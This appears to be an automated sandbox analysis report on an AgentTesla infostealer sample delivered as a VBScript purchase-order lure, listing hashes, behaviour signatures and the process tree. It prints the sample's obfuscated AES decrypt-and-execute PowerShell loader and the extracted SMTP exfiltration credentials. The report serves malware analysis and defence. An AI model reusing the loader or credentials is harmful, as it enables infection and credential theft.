Analysis
-
max time kernel
143s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20231127-en -
resource tags
arch:x64arch:x86image:win10v2004-20231127-enlocale:en-usos:windows10-2004-x64system -
submitted
01-12-2023 06:40
Static task
static1
Behavioral task
behavioral1
Sample
PO_0CT01.vbs
Resource
win7-20231020-en
Behavioral task
behavioral2
Sample
PO_0CT01.vbs
Resource
win10v2004-20231127-en
General
-
Target
PO_0CT01.vbs
-
Size
159KB
-
MD5
dcef6132db05f9704623b495b05c1e4a
-
SHA1
ec64670ba9e10bf41fa634be3f8b7c5bec0f719b
-
SHA256
18f41f2a39ff37e43e2a8e01b0447d613257682929e0d5383458935d8279773c
-
SHA512
6c4eef2875783152687021060b390269e7de5756bcdf45f26880a83a8b65e99240483be5cf72caec6210c706060b53f03ebbf49a46685b4b747fa9c1e27b5b5d
-
SSDEEP
1536:vSBSNS2SNSJSNSImSNSzSNSmSNS8SNSySNSaSNS1SP:v0YzYsYeYmYTY5YHYPYQg
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
mail.dlewarez.info - Port:
587 - Username:
[email protected] - Password:
esubwDViXlQ2@@## - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 11 3436 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3455265224-196869244-2056873367-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LnkName.lnk powershell.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 32 api.ipify.org 33 api.ipify.org -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 3436 set thread context of 2288 3436 powershell.exe RegAsm.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 4320 2288 WerFault.exe RegAsm.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exeRegAsm.exepid process 3436 powershell.exe 3436 powershell.exe 640 powershell.exe 640 powershell.exe 2288 RegAsm.exe 2288 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exeRegAsm.exedescription pid process Token: SeDebugPrivilege 3436 powershell.exe Token: SeDebugPrivilege 640 powershell.exe Token: SeDebugPrivilege 2288 RegAsm.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
WScript.exepowershell.exedescription pid process target process PID 2936 wrote to memory of 3436 2936 WScript.exe powershell.exe PID 2936 wrote to memory of 3436 2936 WScript.exe powershell.exe PID 3436 wrote to memory of 640 3436 powershell.exe powershell.exe PID 3436 wrote to memory of 640 3436 powershell.exe powershell.exe PID 3436 wrote to memory of 2288 3436 powershell.exe RegAsm.exe PID 3436 wrote to memory of 2288 3436 powershell.exe RegAsm.exe PID 3436 wrote to memory of 2288 3436 powershell.exe RegAsm.exe PID 3436 wrote to memory of 2288 3436 powershell.exe RegAsm.exe PID 3436 wrote to memory of 2288 3436 powershell.exe RegAsm.exe PID 3436 wrote to memory of 2288 3436 powershell.exe RegAsm.exe PID 3436 wrote to memory of 2288 3436 powershell.exe RegAsm.exe PID 3436 wrote to memory of 2288 3436 powershell.exe RegAsm.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PO_0CT01.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2936 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function Decrypt-AESEncryption{Param([String]$CBGNKODNPÇ,[String]$Keygfhfghfgiy)$OGjnLfnOaç = New-Object System.Security.Cryptography.AesManaged;$OGjnLfnOaç.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OGjnLfnOaç.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$OGjnLfnOaç.BlockSize = 128;$OGjnLfnOaç.KeySize = 256;$OGjnLfnOaç.Key = (New-Object System.Security.Cryptography.SHA256Managed).ComputeHash([System.Text.Encoding]::UTF8.GetBytes($Keygfhfghfgiy));$BxwZvbgNLo = [System.Convert]::FromBase64String($CBGNKODNPÇ);$OGjnLfnOaç.IV = $BxwZvbgNLo[0..15];$decryptor = $OGjnLfnOaç.CreateDecryptor();$geLJgUoUQL = $decryptor.TransformFinalBlock($BxwZvbgNLo, 16, $BxwZvbgNLo.Length - 16);$OGjnLfnOaç.Dispose();return [System.Text.Encoding]::UTF8.GetString($geLJgUoUQL).Trim([char]0)}$qROuE = '23176310927586413792';$MqDDxKjJmA = 'FoGLCjqpRliJQi11hCtAOF81slvtFOGU9rZ8dC2DlzWrXEyqWGUQQOHJW5CgkrG9HiJw7HT3KtpsBMjn67ekbpqApBChPtQ/ihi0Nt9z8FNBigpDUVbRtDnwD3Tu6oXpHJLJel6aki1Gm2uQ3RuL+5aSgMLijD4gm6JOGiRWUd+DQTgbDbPxZ6oFmyZwkklfZaNnTUrdcpDLK4js4xG5iZVC3zKEpr76zZsUNix/qoSgK2oeIt45qYtT+EhJoxac39p4cS6IFEob0SYg6VlOCgDluaQvAF4RB2tcFPxfgIuTH1FNl6/Eh9WYo20z/3lwNsHmSbQcHGjhL8cM+ohh5m3hT6JOP7MvwDmFe6HqMDvZ7qRIno7IKJdbRac/vxw84zDypr7pF6HDobu0F/cArm5HCyQ+SkgWSEvzCOp3Mpj1HL9kjiiysv3IPllMuWG5F2W9IN8n0u8aCKMMph1skC9W3mYwLv2bVNqzOV1YeGj9oayIf6BmVQlKi39Fv39mocGla8Z74nek8ELKCP9pHXdL8KjXUQercNkF3xKjdsC/Fx1bn+HHzXw3YABqH6U0CA4bqBLyNJuFlN9F1KmeZh/qEYHrWFJvlUV8YcXDYn8f5aK4RwqaaKE5GgFslt39QkHEkYtd4ijirDyGZ08vMTVNd5qxgSJmbAMhkzpfdIyywqXvUBz213IP+o0HfT0A0MgCisgtdX4i5xJZ0kB4azjFZ8PpSfO87gVtgE4jJhsWK9w7FOAZgaNj0i6ovZ7fsK2XXa4GIgF3UajMao5ITbyi3/rb3ANXX+zIUBb+U7DumftlEauMlYY09L9Nh+y1eeHK17CBzcEAILXg56LQJrv6rE3sFaWkAnmUlIUpGNT+SwBTZkK080gVlk2jrY6qJ+eb1d1kK49HlqvKT8bM1EK+nOEvOSyzlIL2ogfhjs6o2a24qtsD9Fh9ou+zbo3aZLK0VwfZx+4gaYQgREUtctIFT9uxSsPMhikmm9fLDZp21+SIzwfSM2fCG1KP56d3jePTR9lhXrZYqX2P9zLNviWqm+jwwURjmeEljvzioyhzmtJ+z5Cr1Pl/w87XTBliumSakj6M86L1Phi0ZORYzicjvALjdsa0GhwyOaOkULl99w8dEwJiZvF6SP/FB3JiYrF3rdqXlLGcZwvZ4xVIoprzWyb98JbKykcExHMBepLzGCe4ca773/Ikiv8lFXJI31KLYJShBcWnUe1lIk7hTZCCP0d8BUEdE3d4fumE3KN8MuyvO7VyzBEGsCKd5QoEW6fKJNl9Y30jwALwq+rhfUMv0Xyxj93w8eApWbx/zh5RaBjmY9ifQETWKwK3tT+LaLdd1Ww/vvPPbAr/HedbdlVdxT1KTyFGExQjSBWDeotvmUkcD6+usolisMw7y93SbQys388JGPJSQCADs5ULDDbE04R2eWBgnUSHSrl57Mp6EVKBhoIVYym6V8lSbq/nQNr7LeeAHuxr98QbQNdu3aguSrF8Mw6yY5pwfhqFl4elRXiP/9/hSD9WZEcSPrs8jeZlgK17K+vxfzr0jg2JL0B5gAyTanNw+zQkmANpOhkMj4ilJ5+dRFMTT7/JW12ZnclRQFtBtTtFgW9qeLzWaE5N2OLr3MTcux2+/OxiSdSUM9paK2l1wALhUoIp1I/TWxQsbyE0dFMC40Qes/fQl4QuMWm7C+xV3hxnHC9Np+zl5gj4M4J35KIB4hWYxmTHvYKeNU6amsgzAvKnToKUqQ==';$GmtBWLkcKU = Decrypt-AESEncryption -CBGNKODNPÇ $MqDDxKjJmA -Key $qROuE;Invoke-Expression $GmtBWLkcKU2⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3436 -
C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\VbsName.vbs3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:640 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2288 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2288 -s 20804⤵
- Program crash
PID:4320
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2288 -ip 22881⤵PID:4380
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
2KB
MD507527a21f5020fbfa90235e555fb3d12
SHA1040725c73329b1d6e5ec6296e2e2d07b4d9c511d
SHA2560b9c4de2cd7194ff554740fa652b00731f8c0fb3d9270698d0be8619d8febdfc
SHA51200cde9bc2fbeba684c616fe6d7a53b06b9518c16b13d00a84e5813e4083bce41f8dd1ec78c41e3fe6cf32777a975154b348e302b36554cf98773876526e18af5
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82